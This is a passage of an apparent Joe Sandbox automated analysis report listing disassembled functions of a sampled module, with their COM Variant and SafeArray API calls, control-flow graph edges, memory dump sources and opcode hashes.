                                                          • API ID: ArraySafe$InitVariant$CreateElementVector$AccessData_malloc
                                                          • String ID:
                                                          • API String ID: 2723946344-0
                                                          • Opcode ID: ddb7654224f299abe30bfa81384e139b0364ddbfa9141676648d4b309ce2fdbc
                                                          • Instruction ID: c465a67404af800767401c4a466acb9f0977626951208bbc45c561c690e5ce28
                                                          • Opcode Fuzzy Hash: ddb7654224f299abe30bfa81384e139b0364ddbfa9141676648d4b309ce2fdbc
                                                          • Instruction Fuzzy Hash: E19147B56083019FD324CF28C880E5BBBF9BF89308F55895EE8959B751D770E905CBA2
                                                          Function 6CF744C0 Relevance: 19.8, APIs: 13, Instructions: 261COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1283 6cf744c0-6cf74538 VariantInit * 2 SafeArrayCreateVector 1284 6cf74542-6cf74564 SafeArrayPutElement VariantClear 1283->1284 1285 6cf7453a-6cf7453d 1283->1285 1286 6cf7476f-6cf74774 1284->1286 1287 6cf7456a-6cf74598 SafeArrayCreateVector SafeArrayPutElement 1284->1287 1285->1284 1289 6cf74776-6cf74777 SafeArrayDestroy 1286->1289 1290 6cf7477d-6cf7479b VariantClear * 2 1286->1290 1287->1286 1288 6cf7459e-6cf745b9 SafeArrayPutElement 1287->1288 1288->1286 1293 6cf745bf-6cf745d2 SafeArrayPutElement 1288->1293 1289->1290 1291 6cf747b0-6cf747c4 1290->1291 1292 6cf7479d-6cf747ad 1290->1292 1292->1291 1293->1286 1294 6cf745d8-6cf745e3 1293->1294 1295 6cf745e5-6cf745ea call 6cfcc1e0 1294->1295 1296 6cf745ef-6cf74604 1294->1296 1295->1296 1296->1286 1299 6cf7460a-6cf74615 1296->1299 1299->1286 1300 6cf7461b-6cf7469f 1299->1300 1307 6cf746a1-6cf7471f 1300->1307 1313 6cf74721-6cf74758 1307->1313 1316 6cf7475f-6cf7476a call 6cf7de60 1313->1316 1317 6cf7475a call 6cfb919e 1313->1317 1319 6cf7476c 1316->1319 1317->1316 1319->1286
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 6CF744FF
                                                          • VariantInit.OLEAUT32(?), ref: 6CF74505
                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CF74516
                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CF74551
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7455A
                                                          • SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6CF74579
                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6CF74594
                                                          • SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6CF745B5
                                                          • SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6CF745CE
                                                          • std::tr1::_Xweak.LIBCPMT ref: 6CF7475A
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF74777
                                                          • VariantClear.OLEAUT32(?), ref: 6CF74787
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7478D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$DestroyXweakstd::tr1::_
                                                          • String ID:
                                                          • API String ID: 1304965753-0
                                                          • Opcode ID: 907590fef4b0053f5d7c42768c0bb7774f9d53026866eef011b0597cdd44553c
                                                          • Instruction ID: 4438a73ee46cbec4a9b976f1d75df380549000c46cbbcfe27530efcc9cbdbf94
                                                          • Opcode Fuzzy Hash: 907590fef4b0053f5d7c42768c0bb7774f9d53026866eef011b0597cdd44553c
                                                          • Instruction Fuzzy Hash: C8A13C75A012069BDB54DBA4C984EAFB7B9FF8D710F14462DE506ABB80C634F941CF60
                                                          Function 6CF7BF00 Relevance: 18.2, APIs: 12, Instructions: 215COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1321 6cf7bf00-6cf7bf6a VariantInit * 4 1322 6cf7bf74-6cf7bf86 1321->1322 1323 6cf7bf6c-6cf7bf71 1321->1323 1324 6cf7bf90-6cf7bfbb call 6cf7c150 1322->1324 1325 6cf7bf88-6cf7bf8d 1322->1325 1323->1322 1328 6cf7c0c4-6cf7c0cd 1324->1328 1329 6cf7bfc1-6cf7bfdf call 6cf7c150 1324->1329 1325->1324 1330 6cf7c0e2-6cf7c149 call 6cfba1f7 * 2 VariantClear * 4 call 6cfb948b 1328->1330 1331 6cf7c0cf-6cf7c0df 1328->1331 1329->1328 1336 6cf7bfe5-6cf7c019 call 6cf7dc40 1329->1336 1331->1330 1341 6cf7c020-6cf7c029 1336->1341 1342 6cf7c01b-6cf7c01e 1336->1342 1346 6cf7c02e 1341->1346 1347 6cf7c02b-6cf7c02c 1341->1347 1345 6cf7c035-6cf7c037 call 6cf744c0 1342->1345 1350 6cf7c03c-6cf7c03e 1345->1350 1348 6cf7c030-6cf7c032 1346->1348 1347->1348 1348->1345 1350->1328 1352 6cf7c044-6cf7c05c VariantInit VariantCopy 1350->1352 1353 6cf7c064-6cf7c07a 1352->1353 1354 6cf7c05e-6cf7c05f call 6cfcc1e0 1352->1354 1353->1328 1357 6cf7c07c-6cf7c094 VariantInit VariantCopy 1353->1357 1354->1353 1358 6cf7c096-6cf7c097 call 6cfcc1e0 1357->1358 1359 6cf7c09c-6cf7c0af 1357->1359 1358->1359 1359->1328 1362 6cf7c0b1-6cf7c0c0 1359->1362 1362->1328
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Variant$Init$Clear$Copy
                                                          • String ID:
                                                          • API String ID: 3833040332-0
                                                          • Opcode ID: aaaf4f1c8a1ed91da78c24d856138488b977bb524b26cd4fd51d7750cd156b64
                                                          • Instruction ID: 4542d070ce0569b57491326af5d15075e963b87e14bcde82cccedbfbf4ed3057
                                                          • Opcode Fuzzy Hash: aaaf4f1c8a1ed91da78c24d856138488b977bb524b26cd4fd51d7750cd156b64
                                                          • Instruction Fuzzy Hash: 8881AC71A01219AFCB14EFA8D884FEEBBB9FF49308F14455DE905A7740DB71A905CBA0
                                                          Function 6CF764D0 Relevance: 18.2, APIs: 12, Instructions: 159COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1363 6cf764d0-6cf76552 VariantInit * 3 SafeArrayCreateVector 1364 6cf76554-6cf76559 1363->1364 1365 6cf7655c-6cf7657e SafeArrayPutElement VariantClear 1363->1365 1364->1365 1366 6cf76584-6cf765a1 1365->1366 1367 6cf76661-6cf76663 1365->1367 1368 6cf765a3-6cf765a6 1366->1368 1369 6cf765ab-6cf765c7 SafeArrayPutElement VariantClear 1366->1369 1370 6cf76665-6cf76666 SafeArrayDestroy 1367->1370 1371 6cf7666c-6cf7669d VariantClear * 3 1367->1371 1368->1369 1369->1367 1372 6cf765cd-6cf765db 1369->1372 1370->1371 1373 6cf765e7-6cf76613 1372->1373 1374 6cf765dd-6cf765e2 call 6cfcc1e0 1372->1374 1386 6cf76616 call 133d149 1373->1386 1387 6cf76616 call 133d148 1373->1387 1374->1373 1376 6cf76618-6cf7661a 1376->1367 1377 6cf7661c-6cf76628 1376->1377 1377->1367 1378 6cf7662a-6cf7663c call 6cf6db30 1377->1378 1378->1367 1381 6cf7663e-6cf76650 call 6cf756b0 call 6cf76880 1378->1381 1385 6cf76655-6cf7665c 1381->1385 1385->1367 1386->1376 1387->1376
                                                          APIs
                                                          • VariantInit.OLEAUT32 ref: 6CF7650C
                                                          • VariantInit.OLEAUT32(?), ref: 6CF76519
                                                          • VariantInit.OLEAUT32(?), ref: 6CF76520
                                                          • SafeArrayCreateVector.OLEAUT32(0000000C), ref: 6CF76531
                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF7656D
                                                          • VariantClear.OLEAUT32(?), ref: 6CF76576
                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF765B6
                                                          • VariantClear.OLEAUT32(?), ref: 6CF765BF
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF76666
                                                          • VariantClear.OLEAUT32(?), ref: 6CF76677
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7667E
                                                          • VariantClear.OLEAUT32(?), ref: 6CF76685
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Variant$Clear$ArraySafe$Init$Element$CreateDestroyVector
                                                          • String ID:
                                                          • API String ID: 1625659656-0
                                                          • Opcode ID: 46e69601101f72becedb0874744dedd29a0bcd0e57239a6f177caf54b786cce2
                                                          • Instruction ID: 9f8eaa4fad9603b6504ad1e3fd33c28be3e92417d20dcc8f8e9086a902daf915
                                                          • Opcode Fuzzy Hash: 46e69601101f72becedb0874744dedd29a0bcd0e57239a6f177caf54b786cce2
                                                          • Instruction Fuzzy Hash: 215128B26183059FC701DF64D880A5BBBF9EFC9704F108A1EF965C7250DB71E9058BA2
                                                          Function 6CF7CB90 Relevance: 18.1, APIs: 12, Instructions: 143COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1388 6cf7cb90-6cf7cc11 VariantInit * 2 SafeArrayCreateVector * 2 SafeArrayPutElement 1389 6cf7cce7-6cf7cce9 1388->1389 1390 6cf7cc17-6cf7cc4b SafeArrayPutElement VariantClear 1388->1390 1392 6cf7ccf2-6cf7cd18 VariantClear * 2 1389->1392 1393 6cf7cceb-6cf7ccec SafeArrayDestroy 1389->1393 1390->1389 1391 6cf7cc51-6cf7cc61 SafeArrayPutElement 1390->1391 1391->1389 1394 6cf7cc67-6cf7cc7b SafeArrayPutElement 1391->1394 1393->1392 1394->1389 1395 6cf7cc7d-6cf7cc8e 1394->1395 1396 6cf7cc90-6cf7cc95 call 6cfcc1e0 1395->1396 1397 6cf7cc9a-6cf7ccc8 1395->1397 1396->1397 1402 6cf7ccc9 call 133d149 1397->1402 1403 6cf7ccc9 call 133d148 1397->1403 1399 6cf7cccb-6cf7cccd 1399->1389 1400 6cf7cccf-6cf7cce1 1399->1400 1400->1389 1401 6cf7cce3 1400->1401 1401->1389 1402->1399 1403->1399
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 6CF7CBCA
                                                          • VariantInit.OLEAUT32(?), ref: 6CF7CBD3
                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CF7CBE4
                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CF7CBF6
                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF7CC0D
                                                          • SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6CF7CC39
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7CC42
                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6CF7CC5D
                                                          • SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6CF7CC77
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF7CCEC
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7CCFC
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7CD02
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$Destroy
                                                          • String ID:
                                                          • API String ID: 3548156019-0
                                                          • Opcode ID: b0d1ac6a52efbcad8eeeb0406de39f4fa358af09af9f80d9f2c6962d0cf903e9
                                                          • Instruction ID: db0968ec4a35d2255d7be15e6e3f8c916daf96eba25ac26b9549df8f6b19aacd
                                                          • Opcode Fuzzy Hash: b0d1ac6a52efbcad8eeeb0406de39f4fa358af09af9f80d9f2c6962d0cf903e9
                                                          • Instruction Fuzzy Hash: F75140B5E0024A9FDB00DFA8D885EDEBFB8FF49714F00815AEA15A7741D770A905CBA0
                                                          Function 6CF6A350 Relevance: 16.7, APIs: 11, Instructions: 206COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1404 6cf6a350-6cf6a3bd VariantInit * 3 call 6cf738e0 1407 6cf6a505-6cf6a528 VariantClear * 3 1404->1407 1408 6cf6a3c3-6cf6a3d6 1404->1408 1409 6cf6a532-6cf6a546 1407->1409 1410 6cf6a52a-6cf6a52d 1407->1410 1411 6cf6a3e0-6cf6a3f7 VariantCopy 1408->1411 1412 6cf6a3d8-6cf6a3dd 1408->1412 1410->1409 1413 6cf6a3ff-6cf6a411 VariantClear 1411->1413 1414 6cf6a3f9-6cf6a3fa call 6cfcc1e0 1411->1414 1412->1411 1416 6cf6a413-6cf6a418 call 6cfcc1e0 1413->1416 1417 6cf6a41d-6cf6a42b 1413->1417 1414->1413 1416->1417 1419 6cf6a431-6cf6a433 1417->1419 1420 6cf6a42d-6cf6a42f 1417->1420 1421 6cf6a436-6cf6a43a 1419->1421 1420->1421 1422 6cf6a440 1421->1422 1423 6cf6a43c-6cf6a43e 1421->1423 1424 6cf6a442-6cf6a477 1422->1424 1423->1424 1440 6cf6a47a call 133d149 1424->1440 1441 6cf6a47a call 133d148 1424->1441 1425 6cf6a47c-6cf6a47e 1425->1407 1426 6cf6a484-6cf6a493 1425->1426 1427 6cf6a495-6cf6a49a call 6cfcc1e0 1426->1427 1428 6cf6a49f-6cf6a4b0 1426->1428 1427->1428 1430 6cf6a4b6-6cf6a4b8 1428->1430 1431 6cf6a4b2-6cf6a4b4 1428->1431 1432 6cf6a4bb-6cf6a4bf 1430->1432 1431->1432 1433 6cf6a4c5 1432->1433 1434 6cf6a4c1-6cf6a4c3 1432->1434 1435 6cf6a4c7-6cf6a503 1433->1435 1434->1435 1435->1407 1437 6cf6a549-6cf6a578 VariantClear * 3 1435->1437 1438 6cf6a582-6cf6a596 1437->1438 1439 6cf6a57a-6cf6a57f 1437->1439 1439->1438 1440->1425 1441->1425
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Variant$Clear$Init$Copy
                                                          • String ID:
                                                          • API String ID: 3214764494-0
                                                          • Opcode ID: 1339953c10d90adbfbfac41319a0b977c06a441b61f4905916bb2b45220804ec
                                                          • Instruction ID: 1d56ce04881985ce8da0479845809a36c077efcd68d635a6be3aae6fe8ae58bf
                                                          • Opcode Fuzzy Hash: 1339953c10d90adbfbfac41319a0b977c06a441b61f4905916bb2b45220804ec
                                                          • Instruction Fuzzy Hash: 977124726083419FD300DF6AC884A5BB7E8FF89714F108A5DFA59CB691DB31E905CB62
                                                          Function 6CF7CD20 Relevance: 15.5, APIs: 10, Instructions: 485COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1496 6cf7cd20-6cf7cd97 VariantInit * 3 SafeArrayCreateVector 1497 6cf7cda1-6cf7cdc0 SafeArrayPutElement VariantClear 1496->1497 1498 6cf7cd99-6cf7cd9c 1496->1498 1499 6cf7cdc6-6cf7cdd1 1497->1499 1500 6cf7d2a0-6cf7d2a2 1497->1500 1498->1497 1503 6cf7cdd3-6cf7cdd8 call 6cfcc1e0 1499->1503 1504 6cf7cddd-6cf7cdef 1499->1504 1501 6cf7d2a4-6cf7d2a5 SafeArrayDestroy 1500->1501 1502 6cf7d2ab-6cf7d2d7 VariantClear * 3 1500->1502 1501->1502 1503->1504 1504->1500 1507 6cf7cdf5-6cf7ce01 1504->1507 1507->1500 1508 6cf7ce07-6cf7cea4 1507->1508 1516 6cf7cea6-6cf7ceb7 1508->1516 1517 6cf7ceba-6cf7cf2b 1508->1517 1516->1517 1523 6cf7cf41-6cf7d222 1517->1523 1524 6cf7cf2d-6cf7cf3e 1517->1524 1559 6cf7d224-6cf7d229 call 6cfcc1e0 1523->1559 1560 6cf7d22e-6cf7d25c 1523->1560 1524->1523 1559->1560 1563 6cf7d25e-6cf7d269 1560->1563 1564 6cf7d29d 1560->1564 1563->1564 1565 6cf7d26b-6cf7d27b call 6cf6db30 1563->1565 1564->1500 1565->1564 1568 6cf7d27d-6cf7d28d call 6cf756b0 call 6cf76880 1565->1568 1572 6cf7d292-6cf7d299 1568->1572 1572->1564
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 6CF7CD5C
                                                          • VariantInit.OLEAUT32(?), ref: 6CF7CD65
                                                          • VariantInit.OLEAUT32(?), ref: 6CF7CD6B
                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF7CD76
                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF7CDAA
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7CDB7
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF7D2A5
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7D2B5
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7D2BB
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7D2C1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
                                                          • String ID:
                                                          • API String ID: 2515392200-0
                                                          • Opcode ID: 41181a5cbab56cea24da0e02ccd4bbb5ccb1df8a416a54b8d681d8934c3c0bad
                                                          • Instruction ID: 3b0cb4f5e9ce283e10fb465340ec6f1afedf356e0e84640321ec3b4e9bacf40a
                                                          • Opcode Fuzzy Hash: 41181a5cbab56cea24da0e02ccd4bbb5ccb1df8a416a54b8d681d8934c3c0bad
                                                          • Instruction Fuzzy Hash: 43120775A15705AFC758DBA8DD84DAAB3B9BF8C300F14466CF50AABB91CA30F841CB50
                                                          Function 6CF766A0 Relevance: 15.2, APIs: 10, Instructions: 155COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1573 6cf766a0-6cf76725 VariantInit * 2 SafeArrayCreateVector 1574 6cf76727-6cf7672a 1573->1574 1575 6cf7672f-6cf7674f SafeArrayPutElement VariantClear 1573->1575 1574->1575 1576 6cf76755-6cf76772 1575->1576 1577 6cf76844-6cf76846 1575->1577 1578 6cf76774-6cf76779 1576->1578 1579 6cf7677c-6cf7679c SafeArrayPutElement VariantClear 1576->1579 1580 6cf7684f-6cf76878 VariantClear * 2 1577->1580 1581 6cf76848-6cf76849 SafeArrayDestroy 1577->1581 1578->1579 1579->1577 1582 6cf767a2-6cf767b0 1579->1582 1581->1580 1583 6cf767b2-6cf767b7 call 6cfcc1e0 1582->1583 1584 6cf767bc-6cf767ef 1582->1584 1583->1584 1596 6cf767f2 call 133d149 1584->1596 1597 6cf767f2 call 133d148 1584->1597 1586 6cf767f4-6cf767f6 1586->1577 1587 6cf767f8-6cf76805 1586->1587 1587->1577 1588 6cf76807-6cf7681c call 6cf6db30 1587->1588 1588->1577 1591 6cf7681e-6cf7683f call 6cf756b0 call 6cf76880 1588->1591 1591->1577 1596->1586 1597->1586
                                                          APIs
                                                          • VariantInit.OLEAUT32 ref: 6CF766DB
                                                          • VariantInit.OLEAUT32 ref: 6CF766EA
                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6CF76700
                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF7673A
                                                          • VariantClear.OLEAUT32(?), ref: 6CF76747
                                                          • SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6CF76787
                                                          • VariantClear.OLEAUT32(?), ref: 6CF76794
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF76849
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7685A
                                                          • VariantClear.OLEAUT32(?), ref: 6CF76861
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: Variant$ArrayClearSafe$ElementInit$CreateDestroyVector
                                                          • String ID:
                                                          • API String ID: 551789342-0
                                                          • Opcode ID: c798138a7869a7e6bd7da299a3f25f854796b86ca1cb6f4ecbaaf9e5fa13c16e
                                                          • Instruction ID: 59dc8b399b126138bf094fee1e73fe770c1159aa20ff3d54246e997ff5f73c66
                                                          • Opcode Fuzzy Hash: c798138a7869a7e6bd7da299a3f25f854796b86ca1cb6f4ecbaaf9e5fa13c16e
                                                          • Instruction Fuzzy Hash: 1E517A766082069FC701DF64C844B9BBBF9EF89714F15861AF954DB250DB30E909CBA2
                                                          Function 6CF7840E Relevance: 13.8, APIs: 9, Instructions: 332COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
